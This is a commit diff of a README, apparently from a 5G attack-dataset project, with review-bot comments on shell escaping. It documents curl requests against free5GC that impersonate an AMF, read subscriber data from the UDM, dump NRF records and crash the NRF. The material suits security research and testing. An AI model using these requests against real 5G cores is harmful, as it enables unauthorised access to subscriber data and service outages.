Projects STRLCPY 5GAD Commits 2e3bc3a5
    README.md
    skipped 57 lines
    58 58  ### AMFLookingForUDM
    59 59  This attack is performed by requesting information about the unified data management (UDM) network function while impersonating an access and mobility management function (AMF). Internally this attack appears to be a benign system request and exploits the fact that the network repository function (NRF) does not check if the source of the request is actually an AMF. This attack is performed with the following Linux command:
    60 60  ```
    61  -curl "http://127.0.0.10:8000/nnrf-disc/v1/nf-instances?requester-nf-type=AMF\&target-nf-type=UDM"
     61 +curl "http://127.0.0.10:8000/nnrf-disc/v1/nf-instances?requester-nf-type=AMF&target-nf-type=UDM"
    62 62  ```
    63 63  where 127.0.0.10 is the IP address of the NRF.
    64 64   
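Review bot: Line 63 names 127.0.0.10 as the NRF address but does not say that it is a loopback address, so the command on line 61 only reaches the NRF from the host that runs the core. State that precondition in the text, or use a labelled placeholder for the address in the command so readers on other deployments know what to substitute. Dropping the backslash before `&` is right, since the URL is already double-quoted.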
    skipped 3 lines
    68 68  ### GetUserData
    69 69  This attack requests information from the UDM regarding a user with `subscriberID=0000000003`. This attack was performed with:
    70 70  ```
    71  -curl "http://127.0.0.3:8000/nudm-dm/v1/imsi-20893\$\{subscriberID\}/am-data?plmn-id=\%7B\%22mcc\%22\%3A\%22208\%22\%2C\%22mnc\%22\%3A\%2293\%22\%7D"
     71 +curl "http://127.0.0.3:8000/nudm-dm/v1/imsi-20893${subscriberID}/am-data?plmn-id=%7B\%22mcc\%22\%3A\%22208\%22\%2C\%22mnc\%22\%3A\%2293\%22\%7D"
    72 72  ```
    73 73   
    74 74  ### randomDataDump
    75 75  This attack exploits a lack of input validation in free5GC and sets the `requester-nf-type` to a random string when making an `nf-instances` request to the NRF. The NRF will still respond with all of the NFs. This attack is executed with the following Linux command:
    76 76  ```
    77  -curl "http://127.0.0.10:8000/nnrf-disc/v1/nf-instances?requester-nf-type=\$randomString\&target-nf-type="
     77 +curl "http://127.0.0.10:8000/nnrf-disc/v1/nf-instances?requester-nf-type=$randomString&target-nf-type="
    78 78  ```
    79 79   
    80 80  ### automatedRedirectWithTimer
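Review bot: On new line 71 the unescaping is only half done: `%7B` lost its backslash, but the following `\%22`, `\%3A`, `\%2C` and `\%7D` still carry one, and inside double quotes the shell passes those backslashes through literally, so the `plmn-id` value is not the intended percent-encoded JSON. Remove the remaining backslashes so the whole query string is consistent. Separately, `${subscriberID}` on line 71 and `$randomString` on line 77 are now real shell expansions, yet the README never shows them being assigned; add the assignment (line 69 gives `subscriberID=0000000003`) before each command. With `$randomString` unset, line 77 expands to the same empty `requester-nf-type=` request that is documented under CrashNRF, which is not what this section describes.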
    skipped 189 lines
    270 270  ### CrashNRF
    271 271  This attack relies on an exploit in free5GC wherein a malformed request to the network repository function (NRF) will cause it to crash. This attack is run using
    272 272  ```
    273  -curl "http://127.0.0.10:8000/nnrf-disc/v1/nf-instances?requester-nf-type=\&target-nf-type="
     273 +curl "http://127.0.0.10:8000/nnrf-disc/v1/nf-instances?requester-nf-type=&target-nf-type="
    274 274  ```
    275 275  where 127.0.0.10 is the IP address of the NRF. As of free5GC v3.1.1, this exploit appears to have been patched, as this HTTP `GET` request will no longer result in the failure of the core.
    276 276  
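Review bot: Line 275 gives the fixed version (free5GC v3.1.1) but not the version on which the crash was observed, so a reader cannot tell which deployments are affected. Add the affected version next to the fixed one, and since the wording is "appears to have been patched", note how that was checked (for example, that the request on line 273 was re-run against v3.1.1 and the NRF stayed up).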
    skipped 46 lines